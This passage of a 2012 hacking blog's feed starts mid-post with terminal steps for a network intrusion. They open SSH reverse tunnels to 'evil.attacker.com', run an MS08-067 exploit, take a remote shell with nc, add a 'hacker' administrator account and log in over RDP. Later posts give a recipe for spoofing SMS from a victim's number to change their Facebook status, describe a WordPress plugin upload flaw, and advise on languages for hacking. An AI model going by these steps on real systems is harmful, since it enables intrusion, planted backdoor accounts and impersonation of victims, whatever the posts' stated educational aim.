&lt;b&gt;(press enter and we got another reverse shell at Terminal E)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;---------------------------&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Go back to Terminal E :&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;(inside the reverse shell)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;ping -c 1 10.150.0.20&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;clear&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;ssh -l root -t -t -R 445:10.150.0.20:445 evil.attacker.com&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;(create a remote tunnel at port 445)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;-----------------------------&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Open Terminal F :&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;netstat antp&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;nmap -sS 127.0.0.1 -p445 --script smb-check-vulns.nse&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;-----------------------------&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Go back to Terminal D :&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;ssh -l root -t -t -R 4444:10.150.0.20:4444 evil.attacker.com&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;(create a remote tunnel at port 4444)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;clear&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;------------------------------&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Go back to Terminal F :&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;cd core&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;nano nx.py --&amp;gt; (a ms08-067 python exploit for win2k3 sp2)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;clear&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;./nx.py 127.0.0.1&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;nc -v 127.0.0.1 4444&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;(we got a remote shell of 10.150.0.20)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;ip config&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;net user hacker hacker /add&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;net localgroup administrators hacker /add&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;---------------------------------&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Go back to Terminal D :&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;(quit the tunnel)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;exit&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;clear&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;ssh -l root -t -t -R 3389:10.150.0.20:3389 evil.attacker.com&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;(create another remote tunnel on port 3389)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;clear&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;-----------------------------------&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Open Terminal G :&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;netstat -antp | grep LISTEN&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;clear&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;rdesktop 127.0.0.1&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;(login to the 10.150.0.20 with username - hacker and password - hacker)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;Credits - ehacking.net for commands.&amp;nbsp;&lt;/i&gt;&lt;/b&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3121270199089759062-9074288813092411791?l=www.rafayhackingarticles.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=9vxHV3FQ9uI:ch-0qfgdAXI:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=9vxHV3FQ9uI:ch-0qfgdAXI:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=9vxHV3FQ9uI:ch-0qfgdAXI:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=9vxHV3FQ9uI:ch-0qfgdAXI:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=9vxHV3FQ9uI:ch-0qfgdAXI:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=9vxHV3FQ9uI:ch-0qfgdAXI:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=9vxHV3FQ9uI:ch-0qfgdAXI:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=9vxHV3FQ9uI:ch-0qfgdAXI:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=9vxHV3FQ9uI:ch-0qfgdAXI:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=9vxHV3FQ9uI:ch-0qfgdAXI:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=9vxHV3FQ9uI:ch-0qfgdAXI:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/9vxHV3FQ9uI" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/9074288813092411791/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2012/01/penetration-testing-in-real-world-by.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/9074288813092411791?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/9074288813092411791?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/9vxHV3FQ9uI/penetration-testing-in-real-world-by.html" title="Penetration Testing in the Real World By Offensive Security" /><author><name>Rafay Baloch</name><uri>http://www.blogger.com/profile/15944091083959815608</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="21" height="32" src="http://2.bp.blogspot.com/-Oq2sCvNga_8/TkK_2qTfs-I/AAAAAAAABXY/GpgdW28vfHM/s220/226160_10150278468603001_538643000_7900302_426914_n.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-o8seGH95K94/TxsQtIA6ZzI/AAAAAAAABsw/8embR8E42Lg/s72-c/firefox-vulnerable.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2012/01/penetration-testing-in-real-world-by.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEEERXw8fCp7ImA9WhRUEEo.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-3796864276804842036</id><published>2012-01-20T08:23:00.000-08:00</published><updated>2012-01-20T08:23:24.274-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-20T08:23:24.274-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Hack Facebook" /><title>Hack Facebook Account Status - Facebook Status Vulnerability</title><content type="html">&lt;div style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;a href="http://4.bp.blogspot.com/-u7R8JLFffSY/TkWYgIA_krI/AAAAAAAABYk/sfso86GPSxY/s1600/Facebook-Hack.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="177" src="http://4.bp.blogspot.com/-u7R8JLFffSY/TkWYgIA_krI/AAAAAAAABYk/sfso86GPSxY/s320/Facebook-Hack.jpg" width="320" /&gt;&lt;/a&gt;We have already disscussed alot about "&lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2009/07/how-to-hack-facebook-account.html"&gt;How To Hack Facebook Passwords&lt;/a&gt;&lt;/b&gt;" in my article T&lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2011/08/hack-facebook-account-passwords.html"&gt;op 10 Ways How Hackers Can Hack Facebook Accounts In 2011&lt;/a&gt;&lt;/b&gt;. However in this article I will talk about a common vulnerablility which can be used by hackers to hack a facebook account status. Before I proceed with this article I would like to mention it clearly that every thing explained here is for educational purposes only. Our mission is not to encourage people to hack facebook accounts, However we want to raise awareness among people regarding latest internet security threats.&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;b&gt;Facebook Account Status Hack - Methodology&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
There are tons of Facebook users who use a feature called facebook text in order to update a facebook status. If you have enabled this feature all you need to do in order to update your status is to type in your status and send it to &lt;b&gt;"923223265".&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
However the idea behind this facebook Account status hack is to send a fake sms from your friend's number, therefore the facebook will think that the message has came from the legitimate source and hence it will update the victims Status.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;SMS Global&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
SMSGlobal is a website that allows you send fake sms, The free account only allows you to send 25 SMS, However the business account allows you to send more. All you need to do is to register on SMS global, activate your account.&amp;nbsp;After logging in to your account, click on &lt;b&gt;“Send SMS to a Number”.&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-8bVKVX4wo1k/TxmS9atmaOI/AAAAAAAABsI/xSIshrSjVA0/s1600/image_2303404.original+copy.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-8bVKVX4wo1k/TxmS9atmaOI/AAAAAAAABsI/xSIshrSjVA0/s1600/image_2303404.original+copy.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;
&lt;/div&gt;Send SMS To:&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;b&gt;923223265 (Facebook)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
Sender ID From: &lt;b&gt;Victims Mobile Number.&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
Message: &lt;b&gt;The Status which you would like to be updated.&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;CounterMeasures&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;Turn off facebook mobile updating feature.&lt;/li&gt;
&lt;/ul&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;Hope you have liked the post! If you have any questions regarding this article, feel free to ask.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3121270199089759062-3796864276804842036?l=www.rafayhackingarticles.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=FkFUvcE_T7U:DWmZx-rYPgU:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=FkFUvcE_T7U:DWmZx-rYPgU:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=FkFUvcE_T7U:DWmZx-rYPgU:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=FkFUvcE_T7U:DWmZx-rYPgU:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=FkFUvcE_T7U:DWmZx-rYPgU:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=FkFUvcE_T7U:DWmZx-rYPgU:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=FkFUvcE_T7U:DWmZx-rYPgU:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=FkFUvcE_T7U:DWmZx-rYPgU:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=FkFUvcE_T7U:DWmZx-rYPgU:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=FkFUvcE_T7U:DWmZx-rYPgU:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=FkFUvcE_T7U:DWmZx-rYPgU:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/FkFUvcE_T7U" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/3796864276804842036/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2012/01/hack-facebook-account-status-facebook.html#comment-form" title="3 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/3796864276804842036?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/3796864276804842036?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/FkFUvcE_T7U/hack-facebook-account-status-facebook.html" title="Hack Facebook Account Status - Facebook Status Vulnerability" /><author><name>Rafay Baloch</name><uri>http://www.blogger.com/profile/15944091083959815608</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="21" height="32" src="http://2.bp.blogspot.com/-Oq2sCvNga_8/TkK_2qTfs-I/AAAAAAAABXY/GpgdW28vfHM/s220/226160_10150278468603001_538643000_7900302_426914_n.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-u7R8JLFffSY/TkWYgIA_krI/AAAAAAAABYk/sfso86GPSxY/s72-c/Facebook-Hack.jpg" height="72" width="72" /><thr:total>3</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2012/01/hack-facebook-account-status-facebook.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEQFQHgzcCp7ImA9WhRUEEw.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-8899429846528276894</id><published>2012-01-19T14:31:00.000-08:00</published><updated>2012-01-19T14:31:51.688-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-19T14:31:51.688-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Wordpress Security" /><title>Wordpress Plugin Easy Comment Uploads Vulnerability - Thousands Of Websites Vulnerable</title><content type="html">&lt;a href="http://3.bp.blogspot.com/-7Tku3UeC_NI/TVUFvZ3pk1I/AAAAAAAABOc/ToYrZyiQJVA/s1600/wordpress-security-lock-300x300.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="160" src="http://3.bp.blogspot.com/-7Tku3UeC_NI/TVUFvZ3pk1I/AAAAAAAABOc/ToYrZyiQJVA/s200/wordpress-security-lock-300x300.png" width="200" /&gt;&lt;/a&gt;&lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2010/12/wordpress-fixes-major-security-issue-by.html"&gt;Wordpress&lt;/a&gt;&lt;/b&gt; as you might know is one of the most widely used &lt;a href="http://www.incomefigure.com/"&gt;blogging&lt;/a&gt; platforms, As a reason of which it has became the favorite target of hackers. Wordpress itself is quite secure, however the plugins make it unsecure resulting in hack attacks, data loss etc, when they are created the developers do not think of the security or do not know how to write the secure code, hence skipping lots of necessary checks making the plugins vulnerable to attacks like SQLInjetion, Remote File inclusion etc.&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
One of those popular vulnerable plugin is Easy Comment Upload plugin, The version&amp;nbsp;0.61 and prior versions are affected with Arbitrary File Upload Vulnerability. The plugin fails to check the upload file type as a reason of which it can be exploited by uploading a Phtml file.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://4.bp.blogspot.com/-n5YkyVOPXvU/TxiXZi9-pYI/AAAAAAAABro/0O3kAzGeygA/s1600/Untitled.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="486" src="http://4.bp.blogspot.com/-n5YkyVOPXvU/TxiXZi9-pYI/AAAAAAAABro/0O3kAzGeygA/s640/Untitled.png" width="577" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-Qb2lKrqFb90/TxiYJcygwWI/AAAAAAAABr0/ChXmLtL3w-k/s1600/wordpress%2Beasy%2Bcomments%2Bplugin.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="392" src="http://4.bp.blogspot.com/-Qb2lKrqFb90/TxiYJcygwWI/AAAAAAAABr0/ChXmLtL3w-k/s640/wordpress%2Beasy%2Bcomments%2Bplugin.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
There are thousands of wordpress blogs still vulnerable to this attack. The vulnerability can be fixed by &lt;b&gt;updating the wordpress easy comments plugin to version 0.71&lt;/b&gt;.&lt;br /&gt;
&lt;br /&gt;
If you want to know more about Protecting your wordpress blog from hackers you can refer the following posts, If you still think your blog is vulnerable drop me an email and I will perform a security&amp;nbsp;assessment&amp;nbsp;on your blog.&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;&lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2011/02/how-to-secure-your-wordpress-blogs.html"&gt;How To Secure Your Wordpress Blogs?&lt;/a&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2011/04/how-to-find-wordpress-version-of.html"&gt;How To Find The Wordpress Version Of A Website/Blog&lt;/a&gt;&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3121270199089759062-8899429846528276894?l=www.rafayhackingarticles.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=XG2R-zRKpzA:qyGLLI_gqGw:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=XG2R-zRKpzA:qyGLLI_gqGw:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=XG2R-zRKpzA:qyGLLI_gqGw:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=XG2R-zRKpzA:qyGLLI_gqGw:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=XG2R-zRKpzA:qyGLLI_gqGw:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=XG2R-zRKpzA:qyGLLI_gqGw:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=XG2R-zRKpzA:qyGLLI_gqGw:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=XG2R-zRKpzA:qyGLLI_gqGw:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=XG2R-zRKpzA:qyGLLI_gqGw:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=XG2R-zRKpzA:qyGLLI_gqGw:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=XG2R-zRKpzA:qyGLLI_gqGw:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/XG2R-zRKpzA" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/8899429846528276894/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2012/01/wordpress-plugin-easy-comment-uploads.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/8899429846528276894?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/8899429846528276894?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/XG2R-zRKpzA/wordpress-plugin-easy-comment-uploads.html" title="Wordpress Plugin Easy Comment Uploads Vulnerability - Thousands Of Websites Vulnerable" /><author><name>Rafay Baloch</name><uri>http://www.blogger.com/profile/15944091083959815608</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="21" height="32" src="http://2.bp.blogspot.com/-Oq2sCvNga_8/TkK_2qTfs-I/AAAAAAAABXY/GpgdW28vfHM/s220/226160_10150278468603001_538643000_7900302_426914_n.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-7Tku3UeC_NI/TVUFvZ3pk1I/AAAAAAAABOc/ToYrZyiQJVA/s72-c/wordpress-security-lock-300x300.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2012/01/wordpress-plugin-easy-comment-uploads.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkUBQ3Y5eyp7ImA9WhRUEEo.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-5940432868288084965</id><published>2012-01-18T07:01:00.000-08:00</published><updated>2012-01-20T08:50:52.823-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-20T08:50:52.823-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Hacking basics" /><title>Which Programming To Learn For Hacking?</title><content type="html">&lt;div style="text-align: left;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;a href="http://3.bp.blogspot.com/-qYfGiDaHNzg/TcmbACnb2aI/AAAAAAAABRo/8bNwPCIsIHs/s1600/computer_programming.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"&gt;&lt;img border="0" height="150" src="http://3.bp.blogspot.com/-qYfGiDaHNzg/TcmbACnb2aI/AAAAAAAABRo/8bNwPCIsIHs/s200/computer_programming.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;Having the prior knowledge of programming is something which will separate you from all the other script kiddes&lt;b&gt;( Wanna be hackers)&lt;/b&gt; and other tool lovers out there, Lots of times during penetration tests you come across a point where you need to write or build your own custom scripts and programs this is where the knowledge of programming comes handy. &lt;br /&gt;
&lt;br /&gt;
The other and by the far the most important advantage of programming is that you will be able to understand exploit codes and even learn to write them too, Though there are softwares which have made the process of exploit writing much simpler, but you still need to have a solid grasp of programming languages in order to know how the exploits work.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
Now that you have understood the importance of learning programming languages, You might be asking yourself “&lt;b&gt;where to began”, “Which programming language&lt;/b&gt;” should I began learning with, Don’t worry, I have seen these types of questions asked a lot in various hacking communities and forums, The answer to these questions is that it depends on your interest.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Web Hacking &lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
Now if you are interested in webhacking subject, subject then I would recommend you to learn the following languages:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1. HTML –&lt;/b&gt; Start with Html if you don’t know it&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;2. Javascript –&lt;/b&gt; Next learn javascript, which will help you understanding the fundamentals of cross site scripting which will be explained later in this book.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;3. SQL Databases – &lt;/b&gt;You should learn to work with databases, which will help you to understand the fundamentals of SQL Injection attacks which will be also explained later in this book when we come to the Web Application hacking chapter.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;4. PHP –&lt;/b&gt; Learning PHP should be your one of your first priorities if you want to understand the mechanisms behind the web hacking attacks. I would recommend you to learn it as soon as possible.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Recommended Sources: &lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;5. W3schools – &lt;/b&gt;W3schools has wide variety of e-learning courses including languages like PHP, HTML, Javascripts etc, If you have zero knowledge of programming languages try starting with HTML and javascript.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Exploit Writing &lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
Exploit writing is a very difficult segment in hacking as it requires pure programming knowledge, which is why I will not recommend you to start with exploit writing, Exploits are/can be coded in almost any programming language e.g C/C++, Python, Perl etc, but more than 50% of the exploits you will find on the web will be coded in C/C++ languages because they were present before any one of other languages.  Languages such as C and C++ are considered as programming languages where as languages such as ruby, perl and python are considered more as scripting languages.&lt;br /&gt;
&lt;br /&gt;
I would recommend you to start with C languages and then to C++, C/C++ have lots of similarities, so if you could get a good grasp on any one of them you can learn the other one easily.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Ruby&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
